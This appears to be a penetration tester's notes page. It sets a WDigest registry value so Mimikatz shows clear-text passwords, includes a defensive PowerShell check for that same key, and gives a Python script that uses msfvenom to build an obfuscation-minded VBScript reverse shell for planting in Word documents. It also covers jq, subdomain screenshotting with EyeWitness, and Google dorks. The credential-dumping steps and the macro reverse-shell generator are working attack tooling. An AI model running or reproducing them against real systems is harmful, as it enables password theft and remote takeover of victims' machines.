Deliberately Show Clear-text Credentials in Mimikatz Output

For demonstration purposes, you might want to show the clear-text passwords in Mimikatz output. Setting the WDigest `UseLogonCredential` value to 1 re-enables WDigest's caching of clear-text credentials in LSASS, which is why a value of 1 here is also something defenders look for.

Step 1) Run the command below as Admin on the victim machine

reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0x00000001

Step 2) Restart the victim machine

Step 3) Run Mimikatz and retrieve the clear-text credentials.
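The defender-side counterpart to the steps above, as an added example that is not part of the original notes: a PowerShell audit helper that reads the same UseLogonCredential value, reports whether clear-text credential caching is enabled, and can restore the hardened setting. The function and parameter names are my own choices.

```powershell
# Added audit helper (not from the original notes; function and parameter names
# are my own). Reads the WDigest UseLogonCredential value the steps above set,
# reports whether clear-text credential caching is on, and can restore the
# hardened setting (0).
function Get-WDigestCredentialCaching {
    [CmdletBinding()]
    param(
        # Write UseLogonCredential = 0; needs an elevated session and a reboot to fully apply
        [switch]$Remediate
    )

    $path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $name = 'UseLogonCredential'

    # $null when the value is absent, otherwise the DWORD that was set
    $current = (Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue).$name

    if ($null -eq $current) {
        $state = 'NotSet (default depends on OS version)'
    } elseif ($current -eq 0) {
        $state = 'Disabled'
    } elseif ($current -eq 1) {
        $state = 'Enabled: LSASS keeps clear-text credentials in memory'
    } else {
        $state = "Unexpected value: $current"
    }

    if ($Remediate -and $current -ne 0) {
        # Create or overwrite the value with the hardened setting
        New-ItemProperty -Path $path -Name $name -Value 0 -PropertyType DWord -Force | Out-Null
        $state = 'Remediated: set to 0, reboot for full effect'
    }

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        UseLogonCredential = $current
        State              = $state
    }
}

# Audit only; add -Remediate to harden the host
Get-WDigestCredentialCaching
```

A value of 1 being written to this key is a common post-exploitation indicator, so the same check is worth pairing with registry value-set telemetry (for example Sysmon Event ID 13) on the key.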

VBScript Python Script

# This Python script can be used to generate VBScript reverse shell to be implanted in Word documents
# Problem is, Windows defender detects the VBScript as malicious, so I need to find a way to obfuscate further

import subprocess

# Get input for IP Address and listening port
ipaddress = input("Input listening IP Address: ")
lport = input("Input listening port: ")

# Run msfvenom to get a reverse shell VBScript
command1 = [
    'msfvenom',
    '-p', 'windows/shell_reverse_tcp',
    f'LHOST={ipaddress}',
    f'LPORT={lport}',
    '-f', 'hta-psh',
    '-o', '/tmp/rev.hta'
]

subprocess.run(command1)

# Read the content of /tmp/rev.hta, cut it, and grep it
output = ''
try:
    cat_command = subprocess.Popen(['cat', '/tmp/rev.hta'], stdout=subprocess.PIPE)
    cut_command = subprocess.Popen(['cut', '-d', '"', '-f', '2'], stdin=cat_command.stdout, stdout=subprocess.PIPE)
    grep_command = subprocess.Popen(['grep', 'powershell.exe -nop'], stdin=cut_command.stdout, stdout=subprocess.PIPE)

    # Get the output of the last command in the pipeline
    output = grep_command.communicate()[0].decode('utf-8')

# Popen raises OSError (e.g. command not found), not CalledProcessError
except (OSError, subprocess.SubprocessError) as e:
    print("Error running the commands:", e)

# Prepare /home/kali/Desktop/reverseshell.vbscript
try:
    with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g:
        g.write('Dim Str As String\n')
    print('\nreverseshell.vbscript successfully created on /home/kali/Desktop/')
except FileNotFoundError:
    print("Error at beginning of script")

# Cut the output of the vbscript to 50 characters per line
# Then input into /home/kali/Desktop/reverseshell.vbscript
n = 50
for i in range(0, len(output), n):
    try:
        # The with-block closes the file; no separate close() needed
        with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as f:
            f.write("Str = Str + " + '"' + output[i:i+n] + '"' + '\n')
    except FileNotFoundError:
        print("The directory does not exist")

# Close off reverseshell.vbscript
try:
    with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g:
        g.write('\nCreateObject("Wscript.Shell").Run Str')
except FileNotFoundError:
    print("Error at end of script")

# Delete /tmp/rev.hta
command2 = ['rm', '/tmp/rev.hta']
subprocess.run(command2)

# Print completion status
print('\nScript complete, please cat /home/kali/Desktop/reverseshell.vbscript')

Using jq

jq is used to filter and manipulate JSON files.

Install it with sudo apt-get install jq

First, ensure that the JSON file starts with something like so:

To pull out specific content, use the following command:

cat file.json | jq -r '.test[] | .a + "\n" + .ac + "\n" + .affected_hosts + "\n" + .affected_users + "\n"'

If a field is a number, jq cannot add it to a string with +, so convert it to a string with tostring:

cat file.json | jq -r '.test[] | .a + "\n" + .ac + "\n" + .affected_hosts + "\n" + (.affected_users|tostring) + "\n"'

Website Accessibility Hunting

  1. Download EyeWitness
  2. Get a list of URLs via crt.sh
    • sudo dnsrecon --iw -d DOMAIN -t crt | grep "DOMAIN" | cut -d ' ' -f 4 | sort -u > list.txt
  3. Inspect list.txt for unwanted entries and remove them manually (to be improved with sed next time)
  4. Use EyeWitness to scan the sites from list.txt, then output to /home/kali/Desktop/DOMAIN/eyewitness/
    • ./EyeWitness.py --web -f /home/kali/Desktop/BugBounty/DOMAIN/hosts.txt --user-agent "vdptest" --prepend-https -d /home/kali/Desktop/BugBounty/DOMAIN/urls_eyewitness
  5. Press "Y" to view the report when prompted

Note if copy-pasting commands:

Retype --iw, as the two hyphens get combined into one long dash (–) when pasted.

Retype " and ' as curly quotes do not paste correctly.

Google Dorks Tips

site: To restrict searches to that specific site

inurl: To return only results that have that text in the URL

filetype: To return only results with the specified file type

-inurl: To exclude results that have that text in the URL